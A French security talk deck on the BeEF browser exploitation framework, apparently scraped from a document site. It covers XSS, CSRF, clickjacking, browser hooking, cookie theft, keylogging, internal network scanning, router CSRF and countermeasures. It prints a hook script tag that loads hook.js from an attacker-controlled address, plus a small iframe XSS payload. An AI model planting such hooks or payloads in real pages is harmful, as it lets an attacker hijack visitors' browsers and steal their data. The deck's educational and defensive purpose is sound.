BeEF : Browser Exploitation Framework



Documents pareils
Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

Tom Pertsekos. Sécurité applicative Web : gare aux fraudes et aux pirates!

WEB page builder and server for SCADA applications usable from a WEB navigator

VTP. LAN Switching and Wireless Chapitre 4

Sécurité des applications web. Daniel Boteanu

OZSSI NORD 4 JUIN LILLE. Conférence thématique: Sécurité des applications

DOCUMENTATION MODULE BLOCKCATEGORIESCUSTOM Module crée par Prestacrea - Version : 2.0

Installer le patch P-2746 et configurer le Firewall avancé

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO)

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

La Sécurité des Données en Environnement DataCenter

Quick Start Guide This guide is intended to get you started with Rational ClearCase or Rational ClearCase MultiSite.

JSSI mars 2012 Laurent Butti Orange France DMGP/PORTAIL

WiFi Security Camera Quick Start Guide. Guide de départ rapide Caméra de surveillance Wi-Fi (P5)

SERVEUR DÉDIÉ DOCUMENTATION

Instructions Mozilla Thunderbird Page 1

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

DOCUMENTATION - FRANCAIS... 2

Phone Manager Soutien de l'application OCTOBER 2014 DOCUMENT RELEASE 4.1 SOUTIEN DE L'APPLICATION

Configurer le Serveur avec une adresse IP Statique (INTERFACE :FastEthernet) : et un masque

WEB & DÉVELOPPEMENT LES BASES DU WEB LE LANGAGE HTML FEUILLES DE STYLES CSS HISTORIQUE D INTERNET ET DU WEB LES DIFFÉRENTS LANGAGES

Groupe Eyrolles, 2004, ISBN :

Web Application Firewalls (WAF)

Programmation Web. Madalina Croitoru IUT Montpellier

Supervision et infrastructure - Accès aux applications JAVA. Document FAQ. Page: 1 / 9 Dernière mise à jour: 15/04/12 16:14

Grandes tendances et leurs impacts sur l acquisition de produits et services TI.

les techniques d'extraction, les formulaires et intégration dans un site WEB

4. SERVICES WEB REST 46

I>~I.J 4j1.bJ1UlJ ~..;W:i 1U

1. Formation F5 - Local Traffic Manager Configuring (LTM)

Paxton. ins Net2 desktop reader USB

ADMINISTRATION DE ADOBE LIVECYCLE MOSAIC 9.5

Sécurité de la ToIP Mercredi 16 Décembre CONIX Telecom

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Phone Manager Soutien de l'application OCTOBER 2014 DOCUMENT RELEASE 4.1 SOUTIEN DE L'APPLICATION

Optimisez la gestion de vos projets IT avec PPM dans le cadre d une réorganisation. SAP Forum, May 29, 2013

Vulnérabilités et solutions de sécurisation des applications Web

en SCÈNE RATIONAL Rational Démonstration SDP : automatisation de la chaîne de développement Samira BATAOUCHE sbataouche@fr.ibm.com

et Active Directory Ajout, modification et suppression de comptes, extraction d adresses pour les listes de diffusion

NFA016 : Introduction. Pour naviguer sur le Web, il faut : Naviguer: dialoguer avec un serveur web

IPS : Corrélation de vulnérabilités et Prévention des menaces

Attaques applicatives

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

Swap: Utilisation et risques Approche de gestion pour les consommateurs

INTRUSION SUR INTERNET

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Devenez un véritable développeur web en 3 mois!

Gestion des prestations Volontaire

Vulnérabilités et sécurisation des applications Web

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

Architecture Orientée Service, JSON et API REST

Le Cloud Computing est-il l ennemi de la Sécurité?

Compte-rendu technique complet et détaillé des cookies

Optimiser ses attaques Web avec Burp Suite

(ATTENTION : une seule réponse possible pour les questions à choix multiples)

WEB 2.0 : Vulnerabilty Reloaded!

Solution de Cloud Trading (VPS)

Application Web et J2EE

First Nations Assessment Inspection Regulations. Règlement sur l inspection aux fins d évaluation foncière des premières nations CONSOLIDATION


Cheque Holding Policy Disclosure (Banks) Regulations. Règlement sur la communication de la politique de retenue de chèques (banques) CONSOLIDATION

86 rue Julie, Ormstown, Quebec J0S 1K0

Micro-ordinateurs, informations, idées, trucs et astuces utiliser le Bureau à distance

Input Tax Credit Information (GST/HST) Regulations

Découvrir les vulnérabilités au sein des applications Web

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

Audits de sécurité, supervision en continu Renaud Deraison

Table des matières. 1. Installation de VMware ESXI Pré-requis Installation... 3

Shibboleth. David Verdin - JOSY "Authentification centralisée pour les applications web" - Paris - 4 février mai

RELEASE NOTES. Les nouveautés Desktop Manager 2.8

RULE 5 - SERVICE OF DOCUMENTS RÈGLE 5 SIGNIFICATION DE DOCUMENTS. Rule 5 / Règle 5

Cedric Dumoulin (C) The Java EE 7 Tutorial

Projet Sécurité des SI

FORMATION PROFESSIONNELLE AU HACKING

HUAWEI TECHNOLOGIES CO., LTD. channelroad. A better way. Together.

Sécurité des applications Retour d'expérience

Prérequis réseau constructeurs

Multiple issuers. La cotation des actions ROBECO ci-dessous est suspendue sur EURONEXT PARIS dans les conditions suivantes :

Développer des Applications Internet Riches (RIA) avec les API d ArcGIS Server. Sébastien Boutard Thomas David

Renforcement de la sécurité des PDF avec Adobe Reader XI et Adobe Acrobat XI

Programmation Web. Introduction

AUDIT COMMITTEE: TERMS OF REFERENCE

JAB, une backdoor pour réseau Win32 inconnu

Vulnérabilité des postes clients

VMware ESX : Installation. Hervé Chaudret RSI - Délégation Centre Poitou-Charentes

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET

Formation Website Watcher

Développement des Systèmes d Information

OUVRIR UN COMPTE CLIENT PRIVÉ

Mise en oeuvre d un Serveur de CD AXIS StorPoint

DOCUMENTATION - FRANCAIS... 2

APPENDIX 6 BONUS RING FORMAT

Archived Content. Contenu archivé

Transcription:

BeEF : Browser Exploitation Framework 18 Presented by Etienne Maynier

# whoami Pentest / audit sécurité Intéressé par l exploitation, la sécurité Web, le fuzzing, la sécurité réseau Participation à des projets opensource à mes heures perdues (BeEF, sulley) MDAL! Page 2

Sommaire Le Web côté client BeEF Présentation Démo Contre Mesures? Page 3

Disclaimer If anything can go wrong, it will. Page 4

Intro Web! Page 5

Attaques web côté client Le navigateur comme point d entrée sur le poste de travail : Phishing Compromission de sites légitimes XSS Persistantes Réfléchies DOM-based Page 6

Same Origin Policy Limitation des actions au domaine Domaine = Protocole + FQDN + port Limitation d accès au domaine pour les cookies, la DOM Limitation des XML HTTP Request cross-domain Bloquées par défaut Ne concerne que les requêtes et pas les balises img, script, iframe, video Implémentation différente selon les langages! Javascript : sauf si le serveur répond avec le bon entête (Access-Control-Allow-Origin: http://example.com) Java & Flash: crossdomain.xml Page 7

Cross Site Request Forgery Image: http://shiflett.org Page 8

ClickJacking Bouton sur un bouton : Utilise la préauthentification de l utilisateur sur le site Ne permet pas d injecter de paramètres POST ou de modifier la page Image: http://t37.net Page 9

Quelques chiffres 75% des sites hébergeant du code malveillant sont des sites légitimes compromis 1 60% des 100 sites les plus populaires ont été impliqués ou ont hébergé une activité malveillante dans la première moitié de l année 2008 1 XSS découverts dans 55% des sites web testés par White Hat Security (1 er type de vulnérabilité) 2 1 - Websense, State of Internet Security, 2008 2 WhiteHat Security Website Statistics Report, Summer 2012 Page 10

Exemples 2005 : XSS dans Google.com 2006 : CSRF dans Digg 2007 : Ver XSS MySpace de Samy Kamkar 2008 : CSRF dans ING permettant de lancer un transfert 2010 : Compromission de apache.org par une XSS «Web App Security Horror Studies», Simon Willison, 2009 Page 11

Page 12

Architecture Ruby avec rails Javascript avec Jquery Source: beefproject.com Page 13

Interface (1/2) Zombies Infos sur le navigateur Page 14

Interface (2/2) Description Historique Commandes Page 15

Hooking Lancement d un script <script src="http://10.1.1.1:3000/hook.js"></script> Marquage du navigateur avec Evercookie Etablissement d un Command & Control avec le navigateur Requêtes Hello toutes les secondes Chargement d une API javascript BeEF basée sur jquery Page 16

Persistance Man In The Browser Simulation de tous les liens en AJAX (seulement dans le domaine) Changement des URL via history.pushstate Autrement ouverture dans un nouvel onglet/fenêtre Le browser reste «hooké»! Démo! Page 17

Play with the browser! Page 18

Récupération d informations Vol de cookies (évidemment) Keylogger Vol de clipboard Liste des sites/domaines visités Fingerprint du navigateur (OS, plugins ) Webcam! Page 19

Social Engineering Page 20

Social Engineering Phishing dans le site! Tab nabbing Beef cloning and mass mailing en développement Page 21

Network Discovery Page 22

Get Internal IP Page 23

Ping Sweep Page 24

DNS Enumeration Page 25

Port Scanning Page 26

Network Fingerprinting «Intranet Footprinting», Javier Marcos de Prado, Juan Galiana Lara Page 27

Remote CSRF CSRF trouvées dans des routeurs / Switch / Cameras Linksys WRT54G : enable remote administration and change password DLINK DSL500T : change password Cisco E2400 change password Camera DLINK DCS : change password Page 28

IRC NAT Pining 1 Envoi une requête HTTP à un server IRC Simule une communication IRC 2 Le Firewall / NAT enregistre la communication et ouvre le port 3 Point d entrée sur le réseau pour l attaquant http://blog.beefproject.com/2012/07/opening-closed-ports-on-nat-device-and.html http://samy.pl/natpin/ Page 29

Page 30

Metasploit Intégration directe de MSF dans BeEF par xml-rpc : Page 31

Tunneling Page 32

Proxy Use as a proxy Transfer HTTP requests (limited by SOP) Page 33

XSS Rays (1/2) Page 34

XSS Rays (2/2) Page 35

Contre-mesures Page 36

Côté Applications Web SDLC Les injections SQL diminuent mais peu de considération pour les XSS / CSRF / Clickjacking «C est juste une XSS» Web Application Firewall Difficile à paramétrer et à gérer Bypassable Page 37

Côté client Mettre à jour les navigateurs et plugins est la règle #1! Java dans le navigateur est mort! Anti XSS IE 8 / No Script... Compromis sécurité / fonctionnalités Peu de protections pour la majorité des attaques C est «juste» du Javascript! Le travail est pour les navigateurs et la standardisation (HTML5 ) Page 38

Côté réseau / organisation Liste blanche des sites acceptés! Limite les possibilités de C&C Gestion des incidents, réaction De plus en plus important avec les APT Page 39

Conclusion Page 40

This document and all information contained herein is the sole property of MDAL SARL. No intellectual property rights are granted by the delivery of this document or the disclosure of its content. This document shall not be reproduced or disclosed to a third party without the express written consent of MDAL SARL. This document and its content shall not be used for any purpose other than that for which it is supplied. The statements made herein do not constitute an offer. They are based on the mentioned assumptions and are expressed in good faith. Where the supporting grounds for these statements are not shown, MDAL SARL. will be pleased to explain the basis thereof. Page 41

Références http://beefproject.com/ «Intranet Footprinting», Javier Marcos de Prado, Juan Galiana Lara Ground BeEF: Cutting, devouring and digesting the legs off a browser, Michele antisnatchor Orru Page 42

Bonus : Vulnérabilité Chromium <iframe srcdoc="<script>alert(2)</script>"></iframe> Status : Won t fix! https://code.google.com/p/chromium/issues/detail?id=148360 Page 43